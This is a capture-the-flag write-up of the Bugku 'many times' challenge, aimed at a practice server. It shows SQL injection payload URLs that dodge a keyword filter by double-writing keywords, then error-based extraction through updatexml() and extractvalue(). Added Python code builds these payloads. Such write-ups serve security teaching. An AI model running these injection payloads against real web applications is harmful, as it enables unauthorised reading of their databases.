Bugku_ many times

Opening the challenge shows a page with nothing of interest, but the URL carries an id parameter. Changing id=1 to id=2 changes the page content, so the value is evidently used in a database query and may be injectable.
Testing how the value is closed:

id=1'  // error
id=1"  // no error

So the value is enclosed in single quotes.
Next, an XOR probe reveals which keywords the filter removes. Appending ^(length('or')!=0) to id=1' makes the query evaluate 1^(length('or')!=0): if the filter deletes or, the literal becomes the empty string, length('') is 0, the comparison is 0 and 1^0 leaves id=1, so the page renders normally; if or survives, 1^1 is 0 and no row matches. A normally rendered page therefore means the keyword is filtered. Probing this way shows that select, or and union are removed. The filter only deletes each keyword once, so it can be bypassed by double writing: uniunionon becomes union once the inner copy is stripped.
Find the number of columns with order by (written oorrder because it contains or), narrowing down by binary search: http://123.206.87.240:9004/1ndex.php?id=1' oorrder by 2--+ succeeds, so there are two columns.
Find which column is echoed: http://123.206.87.240:9004/1ndex.php?id=-1' uniunionon selselectect 1,2--+ shows that the second column is displayed on the page.

Enumerate the tables of the current database (information_schema also contains or and must be doubled): http://123.206.87.240:9004/1ndex.php?id=-1' uniunionon selselectect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+

Enumerate the columns of flag1: http://123.206.87.240:9004/1ndex.php?id=-1' uniunionon selselectect 1,group_concat(column_name) from infoorrmation_schema.columns where table_name='flag1'--+
Read the flag1 column: http://123.206.87.240:9004/1ndex.php?id=-1' uniunionon selselectect 1,group_concat(flag1) from flag1--+
Submitting that value shows it is not the flag, so read the address column as well: http://123.206.87.240:9004/1ndex.php?id=-1' uniunionon selselectect 1,group_concat(address) from flag1--+
The address value leads to a second page, Once_More.php, where the whole process has to be repeated; that is why the challenge is called many times.
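The filter test and double-writing bypass above, as an added example that is not part of the original write-up. It is a local Python model, not the challenge's code: the page never shows the source of 1ndex.php, so the filter is assumed to delete each of select, union and or once per pass. The block models the XOR probe, and a helper that double-writes a payload so it survives. The doubled forms it produces (ununionion) differ from the ones typed in the write-up (uniunionon); any split that leaves one complete keyword after the removal works.

```python
# Added example, not code from the original write-up or the challenge.
# ASSUMPTION: the 1ndex.php filter deletes each blacklisted keyword once, in a
# single pass; the real PHP source is not shown on the page.
import re

# Assumed blacklist: the keywords the XOR probe showed to be filtered.
BANNED = ("select", "union", "or")


def waf(param: str) -> str:
    """Assumed filter model: delete every occurrence of each keyword, one pass per keyword."""
    for kw in BANNED:
        param = re.sub(re.escape(kw), "", param, flags=re.IGNORECASE)
    return param


def xor_probe(keyword: str) -> int:
    """Model of id=1'^(length('<keyword>')!=0)--+ after the filter has run.

    Returns the id the backend ends up selecting: 1 when the keyword was
    stripped (length('')!=0 is 0 and 1^0 = 1, so the page renders), 0 when it
    survived (1^1 = 0, no row matches, blank page).
    """
    survived = len(waf(keyword)) != 0
    return 1 ^ int(survived)


def double_write(payload: str) -> str:
    """Insert each keyword inside itself so one removal pass leaves it intact
    (or -> oorr, union -> ununionion, select -> selselectect)."""
    for kw in BANNED:
        half = len(kw) // 2
        payload = re.sub(re.escape(kw), kw[:half] + kw + kw[half:], payload,
                         flags=re.IGNORECASE)
    return payload


def union_payload(columns: str, from_clause: str = "") -> str:
    """id value for a UNION read that echoes the second column, double-written for the filter."""
    raw = f"-1' union select 1,{columns}"
    if from_clause:
        raw += f" from {from_clause}"
    raw += "-- "   # written --+ in the URL; the + decodes to this space
    return double_write(raw)


if __name__ == "__main__":
    for kw in ("or", "union", "select", "and", "from"):
        print(f"{kw:>7}: page renders" if xor_probe(kw) == 1 else f"{kw:>7}: blank page")
    p = union_payload("group_concat(table_name)",
                      "information_schema.tables where table_schema=database()")
    print("sent:    ", p)
    print("executed:", waf(p))
```

Run it to see which probes render the page (exactly the three filtered words) and how the doubled payload turns back into a clean UNION query once the filter has taken its single pass.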

The second page prints My id=1 and again takes an id parameter in the URL, so it is presumably another injection.
The same closure test shows single-quote closure here too. This page echoes the database error, so error-based injection with updatexml() or extractvalue() is the simplest route.

extractvalue(target XML document, XPath): queries an XML document.
updatexml(target XML document, XPath, replacement): like extractvalue(), but updates the document.
Both raise an XPATH syntax error when the path is malformed, and the error message quotes the offending string. Wrapping the query result in concat(0x7e, ..., 0x7e) makes the path start with ~, which is never valid XPath, so the result comes back inside the error. Only the first 32 characters of the string appear in the message, so a longer value has to be read in pieces with substr().

Injecting with updatexml():
Table names: http://123.206.87.240:9004/Once_More.php?id=1' and updatexml(1,concat(0x7e,(select group_concat( table_name) from information_schema.tables where table_schema=database()),0x7e),1)--+
Column names of flag2: http://123.206.87.240:9004/Once_More.php?id=1' and updatexml(1,concat(0x7e,(select group_concat( column_name) from information_schema.columns where table_name='flag2'),0x7e),1)--+
Column contents: http://123.206.87.240:9004/Once_More.php?id=1' and updatexml(1,concat(0x7e,(select group_concat( flag2,address) from flag2),0x7e),1)--+
This returns the flag.

The same three steps with extractvalue():
Table names: http://123.206.87.240:9004/Once_More.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+
Column names of flag2: http://123.206.87.240:9004/Once_More.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag2'),0x7e))--+
Column contents: http://123.206.87.240:9004/Once_More.php?id=1' and extractvalue(1,concat(0x7e,(select group_concat(flag2,address) from flag2),0x7e))--+
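The error-based payloads for Once_More.php, as an added example that is not part of the original write-up: a Python builder for the updatexml()/extractvalue() id values and a local simulation of the 32-character limit of MySQL's XPATH syntax error, which is why a value longer than that must be paged with substr(). No database is contacted; the column value is a constructed sample, the error message is imitated locally, and the leading 0x7e alone is used as the marker (the write-up also appends a trailing 0x7e, which costs one more character of the window).

```python
# Added example, not code from the original write-up or the challenge.
# MySQL's "XPATH syntax error: '...'" message from updatexml()/extractvalue()
# quotes at most 32 characters of the bad XPath string, so one query leaks at
# most 31 payload characters after the 0x7e ('~') marker. The database is
# simulated here; the value below is constructed, not taken from the target.
import re
from typing import Callable, Optional

MAX_LEAK = 32            # characters of the XPath string MySQL echoes in the error
WINDOW = MAX_LEAK - 1    # one character is spent on the '~' prefix

# Constructed sample, deliberately longer than 32 characters.
SAMPLE_VALUE = "flag{constructed-sample-longer-than-thirty-two-chars}"


def error_payload(func: str, subquery: str, pos: Optional[int] = None) -> str:
    """id value for an error-based read; func is 'updatexml' or 'extractvalue'.
    With pos set, only WINDOW characters from pos (1-based, as in substr) are requested."""
    inner = f"({subquery})" if pos is None else f"substr(({subquery}),{pos},{WINDOW})"
    xpath = f"concat(0x7e,{inner})"
    if func == "updatexml":
        call = f"updatexml(1,{xpath},1)"
    elif func == "extractvalue":
        call = f"extractvalue(1,{xpath})"
    else:
        raise ValueError(f"unknown function {func!r}")
    return f"1' and {call}-- "   # written --+ in the URL


def fake_mysql_error(xpath_string: str) -> str:
    """Simulation of MySQL's reaction to an invalid XPath: the quoted string is truncated."""
    return f"XPATH syntax error: '{xpath_string[:MAX_LEAK]}'"


def parse_leak(message: str) -> str:
    """Pull the leaked characters (after the '~' marker) out of the error text."""
    m = re.fullmatch(r"XPATH syntax error: '~(.*)'", message)
    if m is None:
        raise ValueError("no leak in error message")
    return m.group(1)


def leak_once(value: str) -> str:
    """What the write-up's unpaged payload reveals for a column holding `value`."""
    return parse_leak(fake_mysql_error("~" + value))


def sample_substr(pos: int, length: int) -> str:
    """Local stand-in for MySQL substr() on SAMPLE_VALUE (1-based start)."""
    return SAMPLE_VALUE[pos - 1:pos - 1 + length]


def leak_all(substr: Callable[[int, int], str]) -> str:
    """Page through the value WINDOW characters at a time until a short window appears.
    substr(pos, length) stands in for the database evaluating substr((...),pos,length)."""
    out, pos = "", 1
    while True:
        chunk = parse_leak(fake_mysql_error("~" + substr(pos, WINDOW)))
        out += chunk
        if len(chunk) < WINDOW:
            return out
        pos += WINDOW


if __name__ == "__main__":
    print(error_payload("updatexml", "select group_concat(flag2,address) from flag2"))
    print(error_payload("extractvalue", "select group_concat(flag2,address) from flag2", 32))
    print("unpaged:", leak_once(SAMPLE_VALUE))
    print("paged:  ", leak_all(sample_substr))
```

The unpaged read stops after 31 characters, which is invisible when the flag is short but silently truncates anything longer; the paged version keeps requesting substr() windows until a window comes back shorter than 31 characters.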


Source: blog.csdn.net/weixin_43749601/article/details/109265111